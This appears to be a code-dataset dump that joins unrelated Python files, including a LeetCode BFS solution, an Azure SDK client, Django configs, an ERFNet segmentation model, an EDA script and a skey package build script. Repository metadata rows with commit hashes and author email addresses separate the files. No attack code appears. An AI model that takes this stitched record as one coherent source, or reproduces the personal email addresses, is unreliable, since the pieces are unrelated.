# '1 * 5 = 5\n2 * 5 = 10\n3 * 5 = 15\n4 * 5 = 20\n5 * 5 = 25\n6 * 5 = 30\n7 * 5 = 35\n8 * 5 = 40\n9 * 5 = 45\n10 * 5 = 50'
q = multi_table(1)
q
# '1 * 1 = 1\n2 * 1 = 2\n3 * 1 = 3\n4 * 1 = 4\n5 * 1 = 5\n6 * 1 = 6\n7 * 1 = 7\n8 * 1 = 8\n9 * 1 = 9\n10 * 1 = 10'
| [
"cmantheo@gmail.com"
] | cmantheo@gmail.com |
3afd7c0568a43bde56e0611f65fcbdc799c94449 | 35ff4e124ea73cd2630ddf25dfe019b4b4e3f5d6 | /994_RottingOranges/994_RottingOranges.py | 777017151f0b833177bea0e63b0c234941faf4e8 | [] | no_license | H-Cong/LeetCode | 0a2084a4845b5d7fac67c89bd72a2adf49f90c3d | d00993a88c6b34fcd79d0a6580fde5c523a2741d | refs/heads/master | 2023-03-19T15:22:00.971461 | 2021-03-11T00:33:00 | 2021-03-11T00:33:00 | 303,265,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | class Solution:
def orangesRotting(self, grid: List[List[int]]) -> int:
'''
BFS
'''
if not grid or not grid[0]: return -1
queue = collections.deque()
fresh_orange = 0
row, col = len(grid), len(grid[0])
for r in range(row):
for c in range(col):
if grid[r][c] == 2:
queue.append((r,c))
elif grid[r][c] == 1:
fresh_orange += 1
ans = 0
while queue and fresh_orange:
ans += 1
for _ in range(len(queue)): # NOTE
r, c = queue.popleft()
directions = [(r+1, c), (r-1, c), (r, c+1), (r, c-1)]
for x, y in directions:
if 0 <= x < row and 0 <= y < col and grid[x][y] == 1:
grid[x][y] = 2
fresh_orange -= 1
queue.append((x, y))
return ans if fresh_orange == 0 else -1
# TC: O(r*c)
# SC: O(r*c)
# NOTE: the queue.append() operation wont affect the len(queue) of current level
# ref: https://leetcode.com/problems/rotting-oranges/discuss/563686/
| [
"nych1989@gmail.com"
] | nych1989@gmail.com |
37654083f325ba530ff035d80eda3ac7a47eea19 | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/communication/azure-mgmt-communication/azure/mgmt/communication/aio/_communication_service_management_client.py | c3e466542f9cfccfbf535c2dbf61537086ee6f3a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 5,024 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Awaitable, TYPE_CHECKING
from msrest import Deserializer, Serializer
from azure.core.rest import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from .. import models
from ._configuration import CommunicationServiceManagementClientConfiguration
from .operations import CommunicationServicesOperations, DomainsOperations, EmailServicesOperations, Operations
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class CommunicationServiceManagementClient:
"""REST API for Azure Communication Services.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.communication.aio.operations.Operations
:ivar communication_services: CommunicationServicesOperations operations
:vartype communication_services:
azure.mgmt.communication.aio.operations.CommunicationServicesOperations
:ivar domains: DomainsOperations operations
:vartype domains: azure.mgmt.communication.aio.operations.DomainsOperations
:ivar email_services: EmailServicesOperations operations
:vartype email_services: azure.mgmt.communication.aio.operations.EmailServicesOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param base_url: Service URL. Default value is "https://management.azure.com".
:type base_url: str
:keyword api_version: Api Version. Default value is "2021-10-01-preview". Note that overriding
this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: str = "https://management.azure.com",
**kwargs: Any
) -> None:
self._config = CommunicationServiceManagementClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self._serialize.client_side_validation = False
self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
self.communication_services = CommunicationServicesOperations(self._client, self._config, self._serialize, self._deserialize)
self.domains = DomainsOperations(self._client, self._config, self._serialize, self._deserialize)
self.email_services = EmailServicesOperations(self._client, self._config, self._serialize, self._deserialize)
def _send_request(
self,
request: HttpRequest,
**kwargs: Any
) -> Awaitable[AsyncHttpResponse]:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = await client._send_request(request)
<AsyncHttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.AsyncHttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "CommunicationServiceManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"noreply@github.com"
] | test-repo-billy.noreply@github.com |
3365d477bc72257548753a3d59e5bf3acff947b8 | 17079988dedef6f830633a7a54b181355231fe3e | /pattern.py | 42a4935c831b024ce611f8d9fc3393de41d08823 | [] | no_license | sum008/python-backup | cdf6eaff60d882c36fe86b47ad311955d5869b02 | 729fbe2a5220941f9ba085c693c871592a529da8 | refs/heads/master | 2022-12-12T21:21:48.259680 | 2020-09-12T15:36:05 | 2020-09-12T15:36:05 | 285,461,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | def draw(n):
count=0
max1=0
temp=0
for i in range(1,2*n):
for j in range(2*n-1,0,-1):
if i<=2*n//2:
if count<=max1:
print(str(n-count),end=" ")
temp=count
count+=1
elif count>max1 and not count>j:
print(str(n-temp),end=" ")
else :
temp-=1
print(str(n-temp),end=" ")
else:
if count<=max1:
print(str(n-count),end=" ")
temp=count
count+=1
elif count>max1 and not count>j:
print(str(n-temp),end=" ")
else :
temp-=1
print(str(n-temp),end=" ")
if i<2*n//2: max1+=1
else: max1-=1
count=0
print()
draw(5)
| [
"noreply@github.com"
] | sum008.noreply@github.com |
625054a1aec470b6b43bdf069cfd9cd5e5c346ed | 42260c6cb630820076e771563b589435af6dc247 | /django_by_example/urls.py | d911d81b254bfcddf0f5d0f4dc3af5f4d960cc2d | [] | no_license | pbpoon/dbe | a903aed27a44dc7943976fffd79a1f33d9edf341 | bd50976ab3141ef75a3d5324d8b1e0258281f149 | refs/heads/master | 2021-01-23T01:12:39.242625 | 2017-05-31T13:32:16 | 2017-05-31T13:32:16 | 92,856,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | """django_by_example URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^images/', include('images.urls', namespace='images')),
url(r'^', include('account.urls')),
url(r'^admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| [
"pbpoon@live.com"
] | pbpoon@live.com |
50622297f1a784aa10e0f4e3a806c9881f47e51e | 792cf43c94131428331f2ed8a868144e54948975 | /최종 소스코드(완성본)/html/djangoTest/oiserver/migrations/0010_multiplayroom_roomjson.py | 5d92840acf2be24ea01a9c32459b862598404d22 | [
"MIT"
] | permissive | BaeKeunBin/OIWebProject | c77e74ab4a3cdaea3d220940f7e33ad2b54dea01 | 60467fdec8169dd8a7ac3bf8256d3c06635ba8c5 | refs/heads/master | 2020-04-14T01:41:33.424968 | 2019-02-06T07:54:47 | 2019-02-06T07:54:47 | 115,590,590 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-20 12:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('oiserver', '0009_multiplayroom'),
]
operations = [
migrations.AddField(
model_name='multiplayroom',
name='roomJson',
field=models.TextField(default='default'),
),
]
| [
"lih0420@naver.com"
] | lih0420@naver.com |
061bea63baa0453a60bd7572e9139a98261d8556 | e8f99a162207cba82d4e0f969d7bcdb2b9d8b522 | /dev_demo/struct_demo/struct_demo.py | b9adbaf56356e3ebbebdaefe99d8d4121a77165c | [] | no_license | TesterCC/Python3Scripts | edb5446278ebf13edb64336001081941ca27d67d | 58be67e1ffc74ef50289a885aa4ad05f58e2c383 | refs/heads/master | 2023-08-30T21:16:38.328045 | 2023-08-17T11:23:08 | 2023-08-17T11:23:08 | 93,401,996 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | import struct
# 网络字节序,大端序,数据封装测试
# 方法1:个人认为这个更优
file_header = 0xF3EC2B12
packed_data = struct.pack(">I", file_header)
print(len(packed_data), packed_data)
# 方法2:
hex_str = "F3EC2B12"
bytes_data = bytes.fromhex(hex_str)
print(len(bytes_data), bytes_data)
# output
# 4 b'\xf3\xec+\x12' | [
"testerlyx@foxmail.com"
] | testerlyx@foxmail.com |
9ea419e362a04349cd7136800c00330c6e3e4e10 | 1b08865f72e231a844ca5d3b166d12bdd2a3787a | /bin/getting_started_osg.py | a153fb7cb87a2274076567a25ddfe780036c27de | [] | no_license | radical-experiments/osg_testing | 71536cdfadc7e9eade9b42b25dfc6894462e91a4 | 2b534e3e7420548324fc8f600d1c1c722b8e0b38 | refs/heads/master | 2021-01-17T18:45:35.006374 | 2016-06-19T20:43:18 | 2016-06-19T20:43:18 | 60,442,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,215 | py | #!/usr/bin/env python
__copyright__ = "Copyright 2013-2015, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import sys
import radical.pilot as rp
import radical.utils as ru
import time
dh = ru.DebugHelper ()
print rp
RUNTIME = 1800
SLEEP = 10
PILOTS = 1
UNITS = 1
SCHED = rp.SCHED_BACKFILLING
#SCHED = "backfilling"
resources = {
'osg.xsede-virt-clust' : {
'project' : 'TG-CCR140028',
'queue' : None,
'schema' : 'ssh'
},
'osg.connect' : {
'project' : 'RADICAL',
'queue' : None,
'schema' : 'ssh'
}
}
start_time = time.time()
p_state = []
u_state = []
#------------------------------------------------------------------------------
#
def pilot_state_cb (pilot, state):
    """Pilot-manager callback.

    Prints [pilot.uid, state, seconds-since-start] on every pilot state
    change; elapsed time is measured from the module-level ``start_time``.
    """
    if not pilot:
        return
    #print "[Callback]: ComputePilot '%s' state: %s." % (pilot.uid, state)
   # p_state.append([pilot.uid, state, time.time() - start_time])
    print [pilot.uid, state, time.time() - start_time]
    # Hello HTC :-)
    # In HTC mode a failed pilot is tolerated, so we deliberately do not exit:
    #if state == rp.FAILED:
    #    sys.exit (1)
#------------------------------------------------------------------------------
#
CNT = 0
def unit_state_cb (unit, state):
    """Unit-manager callback.

    Prints [unit.uid, pilot_id, state, seconds-since-start] and counts
    units that reached a final state (FAILED/DONE/CANCELED) in the
    module-level ``CNT``.
    """
    if not unit:
        return
    global CNT
    #print "[Callback]: unit %s on %s: %s." % (unit.uid, unit.pilot_id, state)
   # u_state.append([unit.uid, unit.pilot_id, state, time.time() - start_time])
    print [unit.uid, unit.pilot_id, state, time.time() - start_time]
    if state in [rp.FAILED, rp.DONE, rp.CANCELED]:
        CNT += 1
        #print "[Callback]: # %6d" % CNT
    # Hello HTC :-)
    # A failed unit is tolerated in HTC mode, hence no exit here:
    #if state == rp.FAILED:
    #    print "stderr: %s" % unit.stderr
    #    sys.exit(2)
#------------------------------------------------------------------------------
#
def wait_queue_size_cb(umgr, wait_queue_size):
pass
#print "[Callback]: wait_queue_size: %s." % wait_queue_size
#------------------------------------------------------------------------------
#
if __name__ == "__main__":
# we can optionally pass session name to RP
if len(sys.argv) > 1:
resource = sys.argv[1]
else:
resource = 'local.localhost'
print 'running on %s' % resource
# Create a new session. No need to try/except this: if session creation
# fails, there is not much we can do anyways...
session = rp.Session()
print "session id: %s" % session.uid
# all other pilot code is now tried/excepted. If an exception is caught, we
# can rely on the session object to exist and be valid, and we can thus tear
# the whole RP stack down via a 'session.close()' call in the 'finally'
# clause...
try:
pmgr = rp.PilotManager(session=session)
pmgr.register_callback(pilot_state_cb)
pdescs = list()
for p in range(PILOTS):
pdesc = rp.ComputePilotDescription()
pdesc.resource = resource
pdesc.cores = 1
pdesc.project = resources[resource]['project']
pdesc.queue = resources[resource]['queue']
pdesc.runtime = RUNTIME
pdesc.cleanup = False
pdesc.access_schema = resources[resource]['schema']
pdesc.candidate_hosts = [#'MIT_CMS',
#'UConn-OSG',
'!SU-OG', # No compiler
'!FIU_HPCOSG_CE', # zeromq build fails
#'BU_ATLAS_Tier2',
'!UCSDT2', # Failing because of format character ...
'~(HAS_CVMFS_oasis_opensciencegrid_org =?= TRUE)'
]
pdescs.append(pdesc)
pilots = pmgr.submit_pilots(pdescs)
umgr = rp.UnitManager(session=session, scheduler=SCHED)
umgr.register_callback(unit_state_cb, rp.UNIT_STATE)
umgr.register_callback(wait_queue_size_cb, rp.WAIT_QUEUE_SIZE)
umgr.add_pilots(pilots)
cuds = list()
for unit_count in range(0, UNITS):
cud = rp.ComputeUnitDescription()
cud.executable = "/bin/sh"
cud.arguments = ["-c", "echo $HOSTNAME:$OSG_HOSTNAME && sleep %d" % SLEEP]
cud.cores = 1
cuds.append(cud)
units = umgr.submit_units(cuds)
print session
umgr.wait_units()
print session
#os.system('radicalpilot-close-session -m export -s %s' %session.uid)
#for cu in units:
#print "* Task %s state %s, exit code: %s, stdout: %s, started: %s, finished: %s" \
# % (cu.uid, cu.state, cu.exit_code, cu.stdout, cu.start_time, cu.stop_time)
# os.system ("radicalpilot-stats -m stat,plot -s %s > %s.stat" % (session.uid, session_name))
# print "Pilot Information"
# for i in range(len(p_state)):
# print p_state[i]
# print "\n\nUnit Information"
# for i in range(len(u_state)):
# print u_state[i]
except Exception as e:
# Something unexpected happened in the pilot code above
print "caught Exception: %s" % e
raise
except (KeyboardInterrupt, SystemExit) as e:
# the callback called sys.exit(), and we can here catch the
# corresponding KeyboardInterrupt exception for shutdown. We also catch
# SystemExit (which gets raised if the main threads exits for some other
# reason).
print "need to exit now: %s" % e
finally:
# always clean up the session, no matter if we caught an exception or
# not.
#print "closing session"
os.system('radicalpilot-close-session -m export -s %s' %session.uid)
session.close (cleanup=False)
# the above is equivalent to
#
# session.close (cleanup=True, terminate=True)
#
# it will thus both clean out the session's database record, and kill
# all remaining pilots (none in our example).
#-------------------------------------------------------------------------------
| [
"ming.tai.ha@gmail.com"
] | ming.tai.ha@gmail.com |
9fbf31d149d9fda8df596871ddc7835f704c8451 | c0587882287eee1ca08e0cd30f6ece568da3de91 | /SS-3_files/erfnetv2.py | 6c2bb2efbd03cbd8b82f14b45ba12b1add665658 | [] | no_license | Ashutosh1995/Semseg-Notebooks | 7efe42cf44b647a38eecb4acedaf27c16c0986f7 | c60862da1790954373e57a1ac725d7279df14e59 | refs/heads/master | 2021-01-04T03:35:31.920484 | 2020-06-03T07:20:11 | 2020-06-03T07:20:11 | 240,360,922 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,889 | py | # ERFNet full model definition for Pytorch
# Sept 2017
# Eduardo Romera
#######################
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
class DownsamplerBlock (nn.Module):
    """Downsampling block used by ERFNet.

    Concatenates a strided 3x3 convolution (producing ``noutput - ninput``
    channels) with a 2x2 max-pool of the input (``ninput`` channels), so the
    result has ``noutput`` channels at half the spatial resolution, then
    applies BatchNorm and ReLU.
    """
    def __init__(self, ninput, noutput):
        super().__init__()
        self.conv = nn.Conv2d(ninput, noutput-ninput, (3, 3), stride=2, padding=1, bias=True)
        self.pool = nn.MaxPool2d(2, stride=2)
        self.bn = nn.BatchNorm2d(noutput, eps=1e-3)
    def forward(self, input):
        branches = (self.conv(input), self.pool(input))
        merged = self.bn(torch.cat(branches, 1))
        return F.relu(merged)
class non_bottleneck_1d (nn.Module):
    """ERFNet residual "non-bottleneck-1D" block.

    Each 3x3 convolution is factorized into a 3x1 followed by a 1x3
    convolution; the second pair is dilated to enlarge the receptive field.
    The input is added back at the end (residual connection), so the channel
    count and spatial size are unchanged.

    Args:
        chann: number of input/output channels.
        dropprob: dropout probability (0 disables dropout entirely).
        dilated: dilation factor for the second conv pair.
    """
    def __init__(self, chann, dropprob, dilated):
        super().__init__()
        # First factorized 3x3 conv (no dilation).
        self.conv3x1_1 = nn.Conv2d(chann, chann, (3, 1), stride=1, padding=(1,0), bias=True)
        self.conv1x3_1 = nn.Conv2d(chann, chann, (1,3), stride=1, padding=(0,1), bias=True)
        self.bn1 = nn.BatchNorm2d(chann, eps=1e-03)
        # Second factorized 3x3 conv, dilated; the padding grows with the
        # dilation so the spatial size is preserved.
        self.conv3x1_2 = nn.Conv2d(chann, chann, (3, 1), stride=1, padding=(1*dilated,0), bias=True, dilation = (dilated,1))
        self.conv1x3_2 = nn.Conv2d(chann, chann, (1,3), stride=1, padding=(0,1*dilated), bias=True, dilation = (1, dilated))
        self.bn2 = nn.BatchNorm2d(chann, eps=1e-03)
        self.dropout = nn.Dropout2d(dropprob)
    def forward(self, input):
        output = self.conv3x1_1(input)
        output = F.relu(output)
        output = self.conv1x3_1(output)
        output = self.bn1(output)
        output = F.relu(output)
        output = self.conv3x1_2(output)
        output = F.relu(output)
        output = self.conv1x3_2(output)
        output = self.bn2(output)
        # Apply dropout only when a non-zero probability was configured.
        if (self.dropout.p != 0):
            output = self.dropout(output)
        return F.relu(output+input) #+input = identity (residual connection)
class Encoder(nn.Module):
    """ERFNet encoder: downsampler blocks interleaved with non_bottleneck_1d
    residual blocks, reducing resolution 8x overall while growing channels
    3 -> 16 -> 64 -> 128.

    NOTE(review): the "#5 times"/"#2 times" comments below do not match the
    actual range() counts -- this looks like a slimmed-down variant of the
    published ERFNet; confirm the intended depth.
    """
    def __init__(self, num_classes):
        super().__init__()
        self.initial_block = DownsamplerBlock(3,16)
        self.layers = nn.ModuleList()
        self.layers.append(DownsamplerBlock(16,64))
        for x in range(0, 2):    #5 times
            self.layers.append(non_bottleneck_1d(64, 0.03, 1))
        self.layers.append(DownsamplerBlock(64,128))
        for x in range(0, 1):    #2 times
            self.layers.append(non_bottleneck_1d(128, 0.3, 2))
            self.layers.append(non_bottleneck_1d(128, 0.3, 4))
            self.layers.append(non_bottleneck_1d(128, 0.3, 8))
            self.layers.append(non_bottleneck_1d(128, 0.3, 16))
        # Only used in encoder-only mode (forward(..., predict=True)):
        # 1x1 conv mapping encoder features to per-class scores.
        self.output_conv = nn.Conv2d(128, num_classes, 1, stride=1, padding=0, bias=True)
    def forward(self, input, predict=False):
        """Run the encoder; when ``predict`` is True also apply the 1x1
        classification conv (used for encoder-only training)."""
        output = self.initial_block(input)
        for layer in self.layers:
            output = layer(output)
        if predict:
            output = self.output_conv(output)
        return output
class UpsamplerBlock (nn.Module):
    """Upsampling block used by the ERFNet decoder.

    A 3x3 transposed convolution with stride 2 doubles the spatial
    resolution and maps ``ninput`` channels to ``noutput`` channels,
    followed by BatchNorm and ReLU.
    """
    def __init__(self, ninput, noutput):
        super().__init__()
        self.conv = nn.ConvTranspose2d(ninput, noutput, 3, stride=2, padding=1, output_padding=1, bias=True)
        self.bn = nn.BatchNorm2d(noutput, eps=1e-3)
    def forward(self, input):
        upsampled = self.bn(self.conv(input))
        return F.relu(upsampled)
class Decoder (nn.Module):
    """ERFNet decoder: two upsampling stages (128 -> 64 -> 16 channels),
    each refined by residual non_bottleneck_1d blocks, followed by a final
    transposed conv producing per-class score maps at input resolution."""
    def __init__(self, num_classes):
        super().__init__()
        self.layers = nn.ModuleList()
        self.layers.append(UpsamplerBlock(128,64))
        self.layers.append(non_bottleneck_1d(64, 0, 1))
        self.layers.append(non_bottleneck_1d(64, 0, 1))
        self.layers.append(UpsamplerBlock(64,16))
        self.layers.append(non_bottleneck_1d(16, 0, 1))
        self.layers.append(non_bottleneck_1d(16, 0, 1))
        # Final 2x upsampling that also maps 16 feature channels to
        # num_classes output channels.
        self.output_conv = nn.ConvTranspose2d( 16, num_classes, 2, stride=2, padding=0, output_padding=0, bias=True)
    def forward(self, input):
        output = input
        for layer in self.layers:
            output = layer(output)
        output = self.output_conv(output)
        return output
#ERFNet
class Net(nn.Module):
    """Full ERFNet: encoder + decoder for semantic segmentation.

    Args:
        num_classes: number of output segmentation classes.
        encoder: optional pre-built (e.g. pretrained) encoder; when None a
            fresh :class:`Encoder` is created.
    """
    def __init__(self, num_classes, encoder=None):  #use encoder to pass pretrained encoder
        super().__init__()
        if encoder is None:
            self.encoder = Encoder(num_classes)
        else:
            self.encoder = encoder
            # NOTE(review): nn.Module has no ``load`` method; this call
            # presumably relies on a custom encoder subclass providing it
            # -- confirm before passing a plain Encoder here.
            self.encoder.load('model_best_encoder_decoder_pretrained.pth')
        self.decoder = Decoder(num_classes)
    def forward(self, input, only_encode=False):
        """Segment ``input``; with ``only_encode`` classify directly from
        encoder features and upsample 8x back to input resolution."""
        if only_encode:
            encoded_features = self.encoder.forward(input, predict=True)
            # interpolate() replaces the deprecated nn.functional.upsample
            # with identical behavior.
            return nn.functional.interpolate(encoded_features, mode='bilinear', align_corners=False, scale_factor=8)
        else:
            output = self.encoder(input)
            return self.decoder.forward(output)
| [
"you@example.com"
] | you@example.com |
824cb12edd917c05a044def25f6e971733c2eaac | 6af893ad82d23724700ac3fd80492396d84c9526 | /queencity20/eda/eda_incorporated_towards_end0.py | 85f292760c85cf19760361246c59b91476e473f1 | [] | no_license | abhijeetdtu/queencity20 | aefc9a2847b753ca25e2205faa651c822cd26e54 | 64c2c57ccc45b9ac29a6aadeeaa1e317f1460b0e | refs/heads/master | 2021-01-09T04:45:40.936932 | 2020-02-23T00:37:22 | 2020-02-23T00:37:22 | 242,249,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,421 | py | %load_ext autoreload
%autoreload 2
import pandas as pd
import numpy as np
from queencity20.utils.getData import *
from queencity20.utils.remove_correlated import *
from collections import defaultdict
df = getTrainingData()
df.head()
from sklearn.impute import SimpleImputer
#means = df.mean(skipna=True)
si = SimpleImputer(strategy="median")
df.loc[:,:] = si.fit_transform(df)
fdf = df
fdf = diffCols(fdf)
fdf["target"].describe()
fdf.shape
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
#X_train, X_test, y_train, y_test = testTrainSplit(fdf)
X = fdf.drop(["target"], axis=1)
y = fdf["target"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
#class_weight={"exceptionally high":1, "high":1,"low":1,"medium":25 }
from sklearn.metrics import mean_squared_error, r2_score,roc_auc_score, accuracy_score , confusion_matrix
cormat = fdf.corr()
cormat["target"].sort_values(ascending=False).head(20)
np.abs(cormat["target"]).sort_values(ascending=False).head(20).index
corcols = list(set(find_correlation(fdf.drop("target" , axis=1), threshold=0.8)))
len(corcols)
fdf = fdf.drop(corcols , axis=1)
X = fdf.drop(["target"], axis=1)
y = fdf["target"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
from sklearn.ensemble import RandomForestRegressor
rfr = RandomForestRegressor(max_depth=3)
rfr.fit(X_train , y_train)
featureImpDf = pd.DataFrame({"feature" : X_train.columns , "imp":rfr.feature_importances_})
featureImpDf.sort_values("imp" , ascending=False).head(20)["feature"].values
r2_score(y_test, rfr.predict(X_test))
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestRegressor
#rfr = RandomForestRegressor(n_estimators=5, max_samples=0.8 , max_features=30,ccp_alpha = 0.4,min_samples_split=4, max_depth=5)
rfr = RandomForestRegressor(n_estimators=50, max_samples=0.2 , max_features=0.7,ccp_alpha = 0.4,min_samples_split=4, max_depth=5)
rfr.fit(X,y)
cross_val_score(rfr , X,y ,scoring="neg_mean_squared_error" , cv=10)
testData = getTestData()
testData.loc[: , :] = si.fit_transform(testData)
#testData = testData.fillna(testData.mean(skipna=True))
testData = diffCols(testData)
testData = testData.drop(corcols , axis=1)
preds = rfr.predict(testData)
pd.DataFrame({"pred" : preds}).to_csv("submis.csv")
| [
"abhijeetdtu@gmail.com"
] | abhijeetdtu@gmail.com |
53399e598f3629727a5eda9661611aa9aeb09657 | f50f1aa1f8f139d546db3230a1cb1f53043fd9e6 | /system/base/skey/actions.py | 99e49fdc24508dbe9fe952a82367a3430bfa98c8 | [] | no_license | pars-linux/corporate2 | 7887961d1552d39bc3b0bef4a60fd3413d9b82bb | 14d1eacfc824fb8d0bff8173e7ac06b36b88d10d | refs/heads/master | 2020-05-26T15:02:12.005654 | 2017-02-27T03:07:14 | 2017-02-27T03:07:14 | 82,476,084 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,459 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
#
# Note that we fiddle with permissions of everything to make sure not to make a security hole
#
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import libtools
from pisi.actionsapi import get
def setup():
    """Configure the skey build: force the sendmail path, set the default
    hash via CFLAGS, and put configuration under /etc/skey."""
    shelltools.export("SENDMAIL", "/usr/sbin/sendmail")
    # -DSKEY_HASH_DEFAULT=1 presumably selects the default OTP hash
    # algorithm at compile time -- confirm against the skey sources.
    shelltools.export("CFLAGS", "%s -DSKEY_HASH_DEFAULT=1" % get.CFLAGS())
    autotools.configure("--sysconfdir=/etc/skey")
def build():
autotools.make()
def install():
### Runtime
for i in ["skey", "skeyinit", "skeyinfo"]:
pisitools.dobin(i)
for i in ["otp-md4", "otp-sha1", "otp-md5"]:
pisitools.dosym("skey", "/usr/bin/%s" % i)
pisitools.insinto("/usr/sbin", "skeyprune.pl", "skeyprune")
pisitools.insinto("/usr/bin", "skeyaudit.sh", "skeyaudit")
# these must be suid root so users can generate their passwords, fperms u+s,og-r
for i in ["skeyinit", "skeyinfo", "skeyaudit"]:
shelltools.chmod("%s/usr/bin/%s" % (get.installDIR(), i), 4755)
shelltools.chmod("%s/usr/bin/skey" % get.installDIR(), 0755)
shelltools.chmod("%s/usr/sbin/skeyprune" % get.installDIR(), 0755)
### Developement
pisitools.insinto("/usr/include", "skey.h")
for i in ["libskey.so.1.1.5", "libskey.so.1", "libskey.so"]:
# dolib borks with symlinks
# pisitools.dolib(i, destinationDirectory="/lib")
pisitools.insinto("/lib", i)
shelltools.chmod("%s/lib/%s" % (get.installDIR(), i), 0755)
#libtools.gen_usr_ldscript("libskey.so")
pisitools.dosym("../../lib/libskey.so", "/usr/lib/libskey.so")
### Config
# only root needs to have access to these files. fperms g-rx,o-rx /etc/skey
pisitools.dodir("/etc/skey")
shelltools.chmod("%s/etc/skey" % get.installDIR(), 0700)
# skeyinit will not function if this file is not present. these permissions are applied by the skey system if missing.
shelltools.touch("%s/etc/skey/skeykeys" % get.installDIR())
shelltools.chmod("%s/etc/skey/skeykeys" % get.installDIR(), 0600)
### Docs
for i in ["skey.1", "skeyaudit.1", "skeyinfo.1", "skeyinit.1", "skey.3", "skeyprune.8"]:
pisitools.doman(i)
pisitools.dodoc("CHANGES", "README")
| [
"zaburt@users.noreply.github.com"
] | zaburt@users.noreply.github.com |
6490fcc8e5763a6c0a7bb69a9a97d2da67c7c562 | 6f1034b17b49f373a41ecf3a5a8923fb4948992b | /pychron/git/tasks/githost_preferences.py | 9383d7e63d44223c0e21981f9c7290783093f3e2 | [
"Apache-2.0"
] | permissive | NMGRL/pychron | a6ec1854488e74eb5d3ff53eee8537ecf98a6e2f | 8cfc8085393ace2aee6b98d36bfd6fba0bcb41c6 | refs/heads/main | 2023-08-30T07:00:34.121528 | 2023-06-12T17:43:25 | 2023-06-12T17:43:25 | 14,438,041 | 38 | 28 | Apache-2.0 | 2023-08-09T22:47:17 | 2013-11-15T23:46:10 | Python | UTF-8 | Python | false | false | 4,486 | py | # ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
